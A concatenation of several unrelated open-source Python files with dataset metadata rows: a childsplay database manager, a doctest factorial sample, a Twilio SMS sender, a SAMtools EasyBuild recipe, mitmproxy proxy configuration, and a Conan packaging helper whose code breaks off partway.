DEMO_DT = [{'fortune': 0, 'target': 'demo', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_picture', 'order': 0}, \
{'fortune': 0, 'target': 'demo', 'level': 2, 'group': 'Puzzels', 'cycles': 1,'act_name': 'electro_sp', 'order': 1}, \
{'fortune': 0, 'target': 'demo', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_melody', 'order': 2},\
]
DEFAULT_DT = [{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_picture', 'order': 0},\
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Puzzels', 'cycles': 2,'act_name': 'electro_sp', 'order': 1}, \
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_math', 'order': 2},\
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Puzzels', 'cycles': 2,'act_name': 'numbers_sp', 'order': 3},\
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_sayings', 'order': 4},\
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Korte termijn', 'cycles': 2,'act_name': 'memory_sp', 'order': 5},\
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_picture', 'order': 6}, \
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Puzzels', 'cycles': 2,'act_name': 'findit_sp', 'order': 7}, \
{'fortune': 0, 'target': 'default', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_melody', 'order': 8}
]
EASY_DT = [{'fortune': 0, 'target': 'Easy', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_picture', 'order': 0},\
{'fortune': 0, 'target': 'Easy', 'level': 2, 'group': 'Puzzels', 'cycles': 3, 'act_name': 'electro_sp', 'order': 1},\
{'fortune': 0, 'target': 'Easy', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_sayings', 'order': 2},\
{'fortune': 0, 'target': 'Easy', 'level': 2, 'group': 'Puzzels', 'cycles': 3, 'act_name': 'puzzle', 'order': 3},\
{'fortune': 0, 'target': 'Easy', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_math', 'order': 4},\
{'fortune': 0, 'target': 'Easy', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_melody', 'order': 5},\
]
HARD_DT = [{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_picture', 'order': 0},\
{'fortune': 0, 'target': 'Hard', 'level': 3, 'group': 'Puzzels', 'cycles': 3, 'act_name': 'electro_sp', 'order': 1},\
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_sayings', 'order': 2},\
{'fortune': 0, 'target': 'Hard', 'level': 3, 'group': 'Korte termijn', 'cycles': 3,'act_name': 'memory_sp', 'order': 3}, \
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Lange termijn', 'cycles': 1,'act_name': 'quiz_history', 'order': 4}, \
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Korte termijn', 'cycles': 3, 'act_name': 'soundmemory', 'order': 5},\
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_math', 'order': 6},\
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Puzzels', 'cycles': 3, 'act_name': 'numbers_sp', 'order': 7},\
{'fortune': 0, 'target': 'Hard', 'level': 3, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_math', 'order': 8},\
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Puzzels', 'cycles': 3, 'act_name': 'fourrow', 'order': 9},\
{'fortune': 0, 'target': 'Hard', 'level': 2, 'group': 'Lange termijn', 'cycles': 1, 'act_name': 'quiz_melody', 'order': 10}\
]
class DataManager:
"""Class that handles all users data related stuff except the collecting that
should be done by the activity."""
def __init__(self, spgoodies, dbm):
self.logger = logging.getLogger("childsplay.SPDataManager.DataManager")
self.logger.debug("Starting")
self.SPG = spgoodies
self.cmd_options = self.SPG._cmd_options
self.current_user = self.cmd_options.user
self.current_user_id = None
        self.COPxml = None  # controlpanel stuff
        self.WeAreBTP = False  # only set to True when the BTP login screen is used
atexit.register(self._cleanup)
self.content_engine, self.user_engine = dbm.get_engines()
self.metadata_contentdb, self.metadata_usersdb = dbm.get_metadatas()
self.all_orms = dbm.get_all_orms()
self.orms_content_db, self.orms_userdb = dbm.get_orms()
self.UserSession = sqlorm.sessionmaker(bind=self.user_engine)
self.ContentSession = sqlorm.sessionmaker(bind=self.content_engine)
# query which language we should use.
orm, session = self.get_orm('spconf', 'user')
row = session.query(orm).filter_by(activity_name = 'language_select')\
.filter_by(key = 'locale').first()
if not row:
language = self.cmd_options.lang
if not language:
language = self.cmd_options.default_language
row = orm(activity_name='language_select', key='locale', value=language, comment='locale used by the core')
session.add(row)
row = orm(activity_name='language_select', key='lang', value=language[:2], comment='language code used by the core')
session.add(row)
session.commit()
session.close()
language = set_locale(language)
elif not self.cmd_options.lang:
language = set_locale(row.value)
else:
language = self.cmd_options.lang
if not language:
language = self.cmd_options.default_language
language = set_locale(language)
self.language = language
self.SPG.localesetting = language
self._check_tables_uptodate()
        # Query to get all available CIDs, used to check served_content.
orm, session = self.get_orm('game_available_content', 'content')
query = session.query(orm)
self.all_ids = [result.CID for result in query.all()]
session.close()
if self.cmd_options.no_login:
self.current_user = 'SPUser'
self._start_gdm_greeter()
elif self.cmd_options.user:
self.current_user = self.cmd_options.user
self._start_gdm_greeter()
elif self.SPG.get_theme() == 'braintrainer':
self.WeAreBTP = True
self._start_btp_screen()
else:
self.WeAreBTP = False
# we don't have a working login screen yet
self.current_user='SPUser'
self._start_gdm_greeter()
def reset(self):
self.UserSession.close_all()
self.ContentSession.close_all()
        try:
            self.user_engine.dispose()
            self.content_engine.dispose()
        except Exception:
            # The engines may already be disposed; ignore cleanup errors.
            pass
def _get_language(self):
return self.language
def _check_tables_uptodate(self):
self.logger.debug("_check_tables_uptodate")
reload(SPHelpText)
        modules = [x for x in os.listdir(ACTIVITYDATADIR) if x.endswith('.py')]
# check that all the activities are present in the activity_options table
orm, session = self.get_orm('activity_options', 'user')
        if orm is None:
self.logger.error("No activity_options ORM found, dbase corrupt")
raise MyError, "No activity_options ORM found, dbase corrupt"
for m in modules:
m = m[:-3]
query = session.query(orm)
query = query.filter_by(activity = m)
result = query.first()
if not result:
                # Activity name not found; add it with the default values.
session.add(orm(m))
session.commit()
session.close()
        # Make sure the 'Demo' user exists.
orm, session = self.get_orm('users', 'user')
result = session.query(orm).filter_by(login_name = 'Demo').first()
if not result:
session.query(orm).filter_by(user_id = 1).delete()
neworm = orm()
neworm.user_id = 1
neworm.first_name = 'Demo'
neworm.last_name = ''
neworm.login_name = 'Demo'
neworm.audio = 50
neworm.usersgroup = 0
neworm.dt_target = 'demo'
session.add(neworm)
session.commit()
session.close()
# check for mandatory DT sequences
orm, session = self.get_orm('dt_sequence', 'user')
query = session.query(orm).filter_by(target = 'demo').all()
if len(query) != len(DEMO_DT):
self.logger.info("demo dt target differs from hardcoded sequence, replacing it")
session.query(orm).filter(orm.target == 'demo').delete()
session.commit()
for row in DEMO_DT:
session.add(orm(**row))
query = session.query(orm).filter_by(target = 'default').all()
if not query:
self.logger.info("default dt target missing, adding a hardcoded sequence.")
session.query(orm).filter(orm.target == 'default').delete()
session.commit()
for row in DEFAULT_DT:
session.add(orm(**row))
session.commit()
session.close()
val = self._get_rcrow('SPDatamanager', 'set_extra_dt_sequences')
        if val != 'yes':
            # We also set two extra DT sequences once; the user can remove them.
orm, session = self.get_orm('dt_sequence', 'user')
query = session.query(orm).filter_by(target = 'Easy').all()
if not query:
self.logger.info("First time Easy dt target missing, adding a hardcoded sequence.")
session.query(orm).filter(orm.target == 'Easy').delete()
session.commit()
for row in EASY_DT:
session.add(orm(**row))
query = session.query(orm).filter_by(target = 'Hard').all()
if not query:
self.logger.info("First time Hard dt target missing, adding a hardcoded sequence.")
session.query(orm).filter(orm.target == 'Hard').delete()
session.commit()
for row in HARD_DT:
session.add(orm(**row))
session.commit()
session.close()
self._set_rcrow('SPDatamanager', 'set_extra_dt_sequences', 'yes', 'flag to check if we already have set the extra dt sequences')
def _cleanup(self):
"""atexit function"""
# Nothing to see here, please move on.
self.reset()
def _start_btp_screen(self):
"""Starts a login screen for the braintrainer plus.
Beaware that this only works on a BTP system as the login and
control panel is a proprietary piece of code and it's not included
in the free versions."""
sys.path.insert(0, './controlpanel_lgpl')
import Start_screen as Ss #@UnresolvedImport
self.SPG.dm = self
ss = Ss.Controller(self.SPG, fullscr=self.cmd_options.fullscreen)
result = ss.get_result()
if result[0] == 'user':
self.current_user = result[1]
self._start_gdm_greeter()
elif result[0] == 'quit':
raise StopmeException, 0
elif result[0] == 'controlpanel':
self.COPxml = result[1]
def are_we_cop(self):
return self.COPxml
def _start_gdm_greeter(self):
"""Will start login screen and stores the login name in the db"""
        # Hardcoded for now: forcing the 'Demo' user means the SPgdm greeter
        # below (whose import is disabled at the top of this module) is never reached.
        self.current_user = 'Demo'
if not self.current_user:
g = SPgdm.SPGreeter(self.cmd_options, \
theme=self.cmd_options.theme, \
vtkb=self.SPG.get_virtual_keyboard(), \
fullscr=self.cmd_options.fullscreen)# returns when user hits login button
username = g.get_loginname()
else:
self.logger.debug("Username %s passed as cmdline option, no login screen" % self.current_user)
username = self.current_user
self.logger.debug("Got login: %s" % username)
if not username:
            # We must always run under a user name, so we use the default.
username = self.cmd_options.user
self.logger.debug("No login, setting username to default: %s" % username)
# Now that we have a name we first check if it already exists
# get the users table
orm, session = self.get_orm('users', 'user')
query = session.query(orm)
query = query.filter_by(login_name = username)
result = query.first()
if result:
self.logger.debug("found existing username: %s" % result.login_name)
else:
            # Insert just the login name, NULL for the rest; the user_id is generated.
session.add(orm(login_name=username, first_name=username, usersgroup='SPusers'))
self.logger.debug("inserted %s" % username)
session.commit()
query = session.query(orm)
query = query.filter_by(login_name = username)
result = query.first()
session.close()
        # We must also make sure that at least one users group exists.
orm, session = self.get_orm('group_names', 'user')
rows = [row for row in session.query(orm).order_by(orm.group_name).all()]
if not rows:
# we set a first group
neworm = orm()
neworm.group_name = 'SP Group'
session.add(neworm)
session.commit()
session.close()
self.logger.debug("%s has user id %s" % (username, result.user_id))
self.current_user_id = result.user_id
self.current_user = username
def get_username(self):
"""Returns the current user or None if in anonymousmode"""
self.logger.debug("get_username returns:%s" % self.current_user)
if not self.current_user:
return ''
return self.current_user
def get_user_id(self):
return self.current_user_id
def get_user_id_by_loginname(self, username):
"""Returns the user_id.
@username must be the users login name"""
orm, session = self.get_orm('users', 'user')
query = session.query(orm)
query = query.filter_by(login_name = username)
result = query.first()
if not result:
self.logger.warning("No user %s found, expect more trouble :-(" % username)
else:
return result.user_id
def get_user_dbrow_by_loginname(self, username):
"""Returns the user_id.
@username must be the users login name"""
orm, session = self.get_orm('users', 'user')
query = session.query(orm)
query = query.filter_by(login_name = username)
result = query.first()
if not result:
self.logger.warning("No user %s found, expect more trouble :-(" % username)
return
else:
return result
def get_table_names(self):
"""Returns a list with the names (strings) of the SQL tables currently in use."""
tl = self.metadata_usersdb.tables.keys()
return tl
def get_orm(self, tablename, dbase):
try:
t = self.all_orms[tablename]
except KeyError:
self.logger.warning("get_orm No such table: %s" % tablename)
return None,None
else:
if dbase == 'user':
self.user_engine.dispose()
return (t, self.UserSession())
elif dbase == 'content':
self.content_engine.dispose()
return (t, self.ContentSession())
else:
self.logger.warning("no such dbase: %s" % t)
return None, None
def get_served_content_orm(self):
return self.get_orm('served_content', 'user')
def get_table_data_userdb(self, table):
orm, session = self.get_orm(table, 'user')
query = session.query(orm)
return query.all()
def get_mu_sigma(self, name):
orm, session = self.get_orm('activity_options', 'user')
query = session.query(orm)
query = query.filter_by(activity = name)
result = query.first()
if not result:
self.logger.warning("Not found mu and sigma for %s, expect more trouble :-(" % name)
return
return (result.mu, result.sigma)
def get_served_content_mapper(self):
orm, session = self.get_orm('served_content', 'user')
mclass = ServedMapper(orm, session, self.current_user_id, self.current_user)
return mclass
def get_mapper(self, activity, dbase='user'):
self.logger.debug("get_mapper called with activity:%s" % activity)
#self.metadata_usersdb.bind.echo = True
if not activity:
self.logger.debug("anonymous or no activity, returning bogus")
return BogusMapper()
try:
orm, session = self.get_orm(activity, dbase)
mclass = RowMapper(orm, session, self.current_user_id, self.current_user)
except (KeyError, TypeError):
self.logger.warning("Failed to get mapper or activity doesn't have a dbase table : %s, returning bogus mapper" % activity)
return BogusMapper()
else:
return mclass
# Used by multiple acts through spgoodies
def _check_already_served(self, rows, game_theme, minimum=10, all_ids=None):
"""Returns the rows with the ones that are served removed.
When not enough 'free' rows are left it resets all the count_served fields
and return the complete rows list.
all_ids is a list with with possible ids to check against served ids."""
self.logger.debug("_check_already_served called: %s rows offered" % len(rows))
if not all_ids:
all_ids = self.all_ids
orm, session = self.get_served_content_orm()
query = session.query(orm)
query = query.filter_by(user_id = self.current_user_id)
query = query.filter(orm.game_theme_id.in_(game_theme))
query = query.filter(orm.count_served > 0)
allrows = []
served_ids = []
for row in query.all():
allrows.append(row)
served_ids.append(row.CID)
self.logger.debug("already served rows: %s" % len(served_ids))
notserved = set(all_ids).difference(served_ids)
self.logger.debug("found %s not served cids" % len(notserved))
if len(notserved) < minimum:
# Not enough unserved rows
# first we set all the count_served back to 0
query = session.query(orm).filter_by(user_id = self.current_user_id)
query = query.filter(orm.game_theme_id.in_(game_theme))
query.update({orm.count_served: 0}, synchronize_session=False)
session.commit()
session.close()
            # We now return all rows, as they are now considered not yet served.
self.logger.debug("Resetting served count and returning %s original rows" % len(rows))
return rows
else:
# We must filter the rows by removing nonfree ones
session.close()
rows = [row for row in rows if row.CID in notserved]
self.logger.debug("returning %s rows" % len(rows))
return rows
def _set_rcrow(self, actname, key, value, comment):
orm, session = self.get_orm('spconf', 'user')
query = session.query(orm).filter_by(activity_name = actname).filter_by(key = key).all()
for row in query:
session.delete(row)
row = orm(activity_name=actname, key=key, value=value, comment=comment)
session.add(row)
session.commit()
session.close()
def _get_rcrow(self, actname, key):
val = None
orm, session = self.get_orm('spconf', 'user')
query = session.query(orm).filter_by(activity_name = actname).filter_by(key = key).first()
if query:
val = query.value
session.commit()
session.close()
return val
    def _update_rcrow(self, actname, key, val):
        orm, session = self.get_orm('spconf', 'user')
        query = session.query(orm).filter_by(activity_name = actname).filter_by(key = key).first()
        # Keep the existing comment when the row exists; fall back to an empty
        # string so the _set_rcrow call below never hits an unbound name.
        comm = query.comment if query else ''
        session.commit()
        session.close()
        self._set_rcrow(actname, key, val, comm)
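# A minimal usage sketch of the spconf helpers above (illustrative only; 'dm'
# is assumed to be an already constructed DataManager instance and the key
# names are made up for the example):
def _example_rcrow_roundtrip(dm):
    """Store a flag in the spconf table and read it back."""
    dm._set_rcrow('SPDatamanager', 'example_flag', 'yes', 'illustrative flag')
    return dm._get_rcrow('SPDatamanager', 'example_flag')  # -> 'yes'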
class RowMapper:
"""DB object used by the core and activity to store data in the dbase
table and row beloging to the current activity.
Don't use this class directly, use the DataManagers get_mapper method."""
def __init__(self, orm, session, user_id=None, current_user=''):
self.logger = logging.getLogger("childsplay.SPDataManager.RowMapper")
self.currentuser = current_user
self.user_id = user_id
self.orm = orm
self.session = session
self.coldata = {}
def insert(self, col, data):
"""collects all the data which should go into a row.
You must call 'commit' to actually store it into the dbase."""
self.logger.debug("insert in %s: %s" % (col, data))
self.coldata[col] = data
def update(self, rowdata):
"""insert a row in to the current table.
@rowdata must be a dictionary with column keys and data values.
You must call 'commit' to actually store it into the dbase."""
self.coldata.update(rowdata)
    def commit(self):
        """Flush dbase data to disk.
        Returns None on success and True on failure."""
        if not self.session:
            return
        self.logger.debug("orm %s commit data to dbase" % self.orm._name)
        if hasattr(self.orm, 'user_id'):
            self.insert('user_id', self.user_id)
        self.logger.debug("raw row data:%s" % self.coldata)
        self.session.add(self.orm(**self.coldata))
        self.session.commit()
        self.session.close()
    def _get_level_data(self, levelnum=1):
        """Used by maincore"""
        # Query objects are immutable; the filtered query must be reassigned.
        query = self.session.query(self.orm)
        query = query.filter_by(level = levelnum)
        query = query.filter_by(user_id = self.user_id)
        return query.all()
def _get_start_time(self):
"""Used by the maincore"""
if self.coldata.has_key('start_time'):
return self.coldata['start_time']
def _get_end_time(self):
"""Used by the maincore"""
if self.coldata.has_key('end_time'):
return self.coldata['end_time']
def get_orm(self):
return self.orm
def get_session(self):
return self.session
def close(self):
if not self.session:
return
self.session.close()
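# A minimal sketch of the intended RowMapper call pattern (illustrative only;
# the mapper is normally obtained via DataManager.get_mapper for an activity,
# and 'score' is a made-up column name for this example):
def _example_rowmapper_usage(mapper):
    """Collect a row column by column, then flush it to the dbase."""
    mapper.insert('level', 1)
    mapper.update({'score': 10, 'start_time': datetime.datetime.now()})
    mapper.commit()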
class ServedMapper:
"""DB object for the served_content table in the users db.
Used by the core and activity to store data in the dbase
table and row beloging to the current activity.
Don't use this class directly, use the DataManagers get_mapper method."""
def __init__(self, orm, session, user_id=None, current_user=''):
self.logger = logging.getLogger("childsplay.SPDataManager.ServedMapper")
self.currentuser = current_user
self.user_id = user_id
self.orm = orm
self.session = session
self.coldata = {}
def insert(self, cid, gtheme):
"""collects all the data which should go into a row.
You must call 'commit' to actually store it into the dbase."""
self.logger.debug("insert cid:%s game_theme_id:%s" % (cid, gtheme))
svc = self.orm(user_id=self.user_id, CID=cid,\
game_theme_id=gtheme, \
module='', start_time=datetime.datetime.now(), \
count_served=1)
self.session.add(svc)
def commit(self):
if not self.session:
return
self.logger.debug("commiting session")
self.session.commit()
self.session.close()
def close(self):
if not self.session:
return
self.session.close()
class BogusMapper:
"""Bogus mapper class used when we are in anonymousmode"""
def __init__(self):
pass
def __str__(self):
return "BogusMapper"
def __repr__(self):
return "BogusMapper"
def insert(self, col, data):
pass
def insert_row(self, rowdata):
pass
def update(self, rowdata):
pass
def commit(self):
pass
def close(self):
pass
def get_table_column_names(self):
pass
def get_table_data(self):
pass
def delete_row(self, row_id):
pass
def get_table_selection(self, args):
pass
def _get_start_time(self):
return "2000-01-01_00:00:00"
def _get_end_time(self):
return "2000-01-01_00:00:00"
    def _get_level_data(self, levelnum=1):
        return None
|
gpl-3.0
| -4,219,586,625,147,050,500
| 43.883871
| 141
| 0.582974
| false
| 3.708422
| false
| false
| false
|
liavkoren/djangoDev
|
tests/test_discovery_sample/doctests.py
|
1
|
1192
|
"""
Doctest example from the official Python documentation.
https://docs.python.org/3/library/doctest.html
"""
def factorial(n):
    """Return the factorial of n, an exact integer >= 0.

    >>> [factorial(n) for n in range(6)]
    [1, 1, 2, 6, 24, 120]
    >>> factorial(30)
    265252859812191058636308480000000
    >>> factorial(-1)
    Traceback (most recent call last):
        ...
    ValueError: n must be >= 0

    Factorials of floats are OK, but the float must be an exact integer:

    >>> factorial(30.1)
    Traceback (most recent call last):
        ...
    ValueError: n must be exact integer
    >>> factorial(30.0)
    265252859812191058636308480000000

    It must also not be ridiculously large:

    >>> factorial(1e100)
    Traceback (most recent call last):
        ...
    OverflowError: n too large
    """
import math
if not n >= 0:
raise ValueError("n must be >= 0")
if math.floor(n) != n:
raise ValueError("n must be exact integer")
if n+1 == n: # catch a value like 1e300
raise OverflowError("n too large")
result = 1
factor = 2
while factor <= n:
result *= factor
factor += 1
return result
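# As suggested in the doctest documentation, running this module as a script
# executes the examples embedded in the docstring above:
if __name__ == "__main__":
    import doctest
    doctest.testmod()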
|
bsd-3-clause
| -1,257,162,544,663,341,300
| 25.488889
| 72
| 0.605705
| false
| 3.736677
| false
| false
| false
|
ilstreltsov/django-db-mailer
|
dbmail/providers/twilio/sms.py
|
1
|
1317
|
# -*- coding: utf-8 -*-
from httplib import HTTPSConnection
from urllib import urlencode
from base64 import b64encode
from json import loads
from django.conf import settings
from dbmail.providers.prowl.push import from_unicode
from dbmail import get_version
class TwilioSmsError(Exception):
pass
def send(sms_to, sms_body, **kwargs):
"""
Site: https://www.twilio.com/
API: https://www.twilio.com/docs/api/rest/sending-messages
"""
headers = {
"Content-type": "application/x-www-form-urlencoded",
"User-Agent": "DBMail/%s" % get_version(),
'Authorization': 'Basic %s' % b64encode(
"%s:%s" % (
settings.TWILIO_ACCOUNT_SID, settings.TWILIO_AUTH_TOKEN
)).decode("ascii")
}
kwargs.update({
'From': kwargs.pop('sms_from', settings.TWILIO_FROM),
'To': sms_to,
'Body': from_unicode(sms_body)
})
http = HTTPSConnection(kwargs.pop("api_url", "api.twilio.com"))
http.request(
"POST",
"/2010-04-01/Accounts/%s/Messages.json" % settings.TWILIO_ACCOUNT_SID,
headers=headers,
body=urlencode(kwargs))
response = http.getresponse()
if response.status != 201:
raise TwilioSmsError(response.reason)
return loads(response.read()).get('sid')
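# A minimal usage sketch (illustrative only: the recipient number and body are
# placeholders, and TWILIO_ACCOUNT_SID/TWILIO_AUTH_TOKEN/TWILIO_FROM must be
# configured in the Django settings):
def example_send():
    return send('+15551234567', 'Hello from dbmail')  # returns the message SID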
|
gpl-2.0
| -5,037,271,726,113,817,000
| 25.34
| 78
| 0.626424
| false
| 3.456693
| false
| false
| false
|
JensTimmerman/easybuild-easyblocks
|
easybuild/easyblocks/s/samtools.py
|
1
|
3213
|
# This file is an EasyBuild recipe as per https://github.com/hpcugent/easybuild
#
# Copyright:: Copyright (c) 2012 University of Luxembourg / LCSB
# Author:: Cedric Laczny <cedric.laczny@uni.lu>, Fotis Georgatos <fotis.georgatos@uni.lu>
# License:: MIT/GPL
# File:: $File$
# Date:: $Date$
"""
Easybuild support for building SAMtools (SAM - Sequence Alignment/Map)
"""
import os
import shutil
from easybuild.easyblocks.generic.configuremake import ConfigureMake
class EB_SAMtools(ConfigureMake):
"""
Support for building SAMtools; SAM (Sequence Alignment/Map) format
is a generic format for storing large nucleotide sequence alignments.
"""
def __init__(self, *args, **kwargs):
"""Define lists of files to install."""
super(EB_SAMtools, self).__init__(*args, **kwargs)
self.bin_files = ["bcftools/vcfutils.pl", "bcftools/bcftools", "misc/blast2sam.pl",
"misc/bowtie2sam.pl", "misc/export2sam.pl", "misc/interpolate_sam.pl",
"misc/novo2sam.pl", "misc/psl2sam.pl", "misc/sam2vcf.pl", "misc/samtools.pl",
"misc/soap2sam.pl", "misc/varfilter.py", "misc/wgsim_eval.pl",
"misc/zoom2sam.pl", "misc/md5sum-lite", "misc/md5fa", "misc/maq2sam-short",
"misc/maq2sam-long", "misc/wgsim", "misc/seqtk", "samtools"]
self.lib_files = ["libbam.a"]
self.include_files = ["bam.h", "bam2bcf.h", "bam_endian.h", "bgzf.h", "errmod.h", "faidx.h", "kaln.h",
"khash.h", "klist.h", "knetfile.h", "kprobaln.h", "kseq.h", "ksort.h", "kstring.h",
"razf.h", "sam.h", "sam_header.h", "sample.h"]
def configure_step(self):
"""
No configure
"""
pass
def install_step(self):
"""
Install by copying files to install dir
"""
for (srcdir, dest, files) in [
(self.cfg['start_dir'], 'bin', self.bin_files),
(self.cfg['start_dir'], 'lib', self.lib_files),
(self.cfg['start_dir'], 'include/bam', self.include_files)
]:
destdir = os.path.join(self.installdir, dest)
srcfile = None
try:
os.makedirs(destdir)
for filename in files:
srcfile = os.path.join(srcdir, filename)
shutil.copy2(srcfile, destdir)
except OSError, err:
self.log.error("Copying %s to installation dir %s failed: %s" % (srcfile, destdir, err))
def sanity_check_step(self):
"""Custom sanity check for SAMtools."""
custom_paths = {
'files': ['bin/%s' % x for x in [f.split('/')[-1] for f in self.bin_files]] +
['lib/%s' % x for x in self.lib_files] +
['include/bam/%s' % x for x in self.include_files],
'dirs': []
}
super(EB_SAMtools, self).sanity_check_step(custom_paths=custom_paths)
|
gpl-2.0
| 7,332,690,638,706,083,000
| 41.276316
| 113
| 0.521631
| false
| 3.496192
| false
| false
| false
|
xaxa89/mitmproxy
|
mitmproxy/proxy/config.py
|
1
|
3861
|
import os
import re
from typing import Any
from OpenSSL import SSL, crypto
from mitmproxy import exceptions
from mitmproxy import options as moptions
from mitmproxy import certs
from mitmproxy.net import tcp
from mitmproxy.net import server_spec
CONF_BASENAME = "mitmproxy"
class HostMatcher:
def __init__(self, patterns=tuple()):
self.patterns = list(patterns)
self.regexes = [re.compile(p, re.IGNORECASE) for p in self.patterns]
    def __call__(self, address):
        if not address:
            return False
        host = "%s:%s" % address
        return any(rex.search(host) for rex in self.regexes)
def __bool__(self):
return bool(self.patterns)
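# A small self-contained sketch of how HostMatcher is used (the pattern and
# address below are illustrative values):
def _example_host_match():
    matcher = HostMatcher([r"example\.com:443"])
    return matcher(("example.com", 443))  # True: "example.com:443" matches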
class ProxyConfig:
def __init__(self, options: moptions.Options) -> None:
self.options = options
self.check_ignore = None # type: HostMatcher
self.check_tcp = None # type: HostMatcher
self.certstore = None # type: certs.CertStore
self.client_certs = None # type: str
self.openssl_verification_mode_server = None # type: int
self.configure(options, set(options.keys()))
options.changed.connect(self.configure)
def configure(self, options: moptions.Options, updated: Any) -> None:
if options.add_upstream_certs_to_client_chain and not options.ssl_insecure:
raise exceptions.OptionsError(
"The verify-upstream-cert requires certificate verification to be disabled. "
"If upstream certificates are verified then extra upstream certificates are "
"not available for inclusion to the client chain."
)
if options.ssl_insecure:
self.openssl_verification_mode_server = SSL.VERIFY_NONE
else:
self.openssl_verification_mode_server = SSL.VERIFY_PEER
self.check_ignore = HostMatcher(options.ignore_hosts)
self.check_tcp = HostMatcher(options.tcp_hosts)
self.openssl_method_client, self.openssl_options_client = \
tcp.sslversion_choices[options.ssl_version_client]
self.openssl_method_server, self.openssl_options_server = \
tcp.sslversion_choices[options.ssl_version_server]
certstore_path = os.path.expanduser(options.cadir)
if not os.path.exists(os.path.dirname(certstore_path)):
raise exceptions.OptionsError(
"Certificate Authority parent directory does not exist: %s" %
os.path.dirname(options.cadir)
)
self.certstore = certs.CertStore.from_store(
certstore_path,
CONF_BASENAME
)
if options.client_certs:
client_certs = os.path.expanduser(options.client_certs)
if not os.path.exists(client_certs):
raise exceptions.OptionsError(
"Client certificate path does not exist: %s" %
options.client_certs
)
self.client_certs = client_certs
for c in options.certs:
parts = c.split("=", 1)
if len(parts) == 1:
parts = ["*", parts[0]]
cert = os.path.expanduser(parts[1])
if not os.path.exists(cert):
raise exceptions.OptionsError(
"Certificate file does not exist: %s" % cert
)
try:
self.certstore.add_cert_file(parts[0], cert)
except crypto.Error:
raise exceptions.OptionsError(
"Invalid certificate format: %s" % cert
)
m = options.mode
if m.startswith("upstream:") or m.startswith("reverse:"):
_, spec = server_spec.parse_with_mode(options.mode)
self.upstream_server = spec
|
mit
| 2,367,711,487,147,280,000
| 34.75
| 93
| 0.599068
| false
| 4.219672
| false
| false
| false
|
aldebaran/qibuild
|
python/qitoolchain/conan.py
|
1
|
3506
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2021 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" Create a Conan Package with QiBuild tools """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import os
import tempfile
import qisys.sh
import qisys.command
import qisys.interact
from qisys import ui
class Conan(object):
""" This class create a conan package directory ready to be converted by qitoolchain """
def __init__(self, name, version, channels=None, is_shared=None):
""" Conan class allows us to create a conanfile and compile the library with conan."""
self.name = name
self.version = version
self.channels = channels
self.is_shared = is_shared
self.temp_dir = None
self.conanfile = None
self.package_path = None
def __del__(self):
if self.package_path is not None:
self.clean()
def create(self):
"""
Ask conan channel and parameters to create a conanfile and build it
Tested with: "boost/1.68.0@conan/stable" shared
"""
if not self.channels:
question = "Which conan library do you want to add?"
channel = qisys.interact.ask_string(question, default=True)
self.channels = [channel]
if self.is_shared is None:
question = "Do you want it to be shared (highly recommended)?"
self.is_shared = qisys.interact.ask_yes_no(question, default=True)
self.prepare()
self.write_conanfile()
self.build()
return self.package_path
def prepare(self):
""" Create a temporary directory where to build the library. """
self.temp_dir = tempfile.mkdtemp("-qiconan-{}-{}".format(self.name, self.version))
self.package_path = os.path.join(self.temp_dir, "package")
def write_conanfile(self):
""" Write a default conanfile.txt with standard informations """
assert self.temp_dir, "This build is not ready, please call prepare()"
self.conanfile = os.path.join(self.temp_dir, "conanfile.txt")
ui.info(" * Write conanfile in", self.conanfile)
with open(self.conanfile, "w") as fp:
fp.write("[requires]" + os.linesep)
for c in self.channels:
fp.write(c + os.linesep)
fp.write(os.linesep)
fp.write("[options]" + os.linesep)
for c in self.channels:
fp.write("{}:shared={}{}".format(c.split('/')[0], self.is_shared, os.linesep))
fp.write(os.linesep)
contents = """\
[generators]
json
[imports]
bin, *.dll -> ./bin
lib, *.lib* -> ./lib
lib, *.dylib* -> ./lib
lib, *.so* -> ./lib
lib, *.a* -> ./lib
include, * -> ./include
"""
fp.write(contents)
def build(self):
""" Call conan command to build the package with the conanfile """
ui.info(" * Building library with conan in", self.package_path)
qisys.command.check_is_in_path("conan")
conan_path = qisys.command.find_program("conan")
cmd = [conan_path, "install", self.conanfile, "--build", "--install-folder", self.package_path]
qisys.command.call(cmd)
def clean(self):
""" Remove the temporary directory """
ui.info(" * Removing temporary directory")
qisys.sh.rm(self.temp_dir)
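# A minimal usage sketch (the channel below is the example mentioned in the
# create() docstring; note that calling this triggers a real conan build):
def _example_conan_package():
    conan = Conan("boost", "1.68.0",
                  channels=["boost/1.68.0@conan/stable"], is_shared=True)
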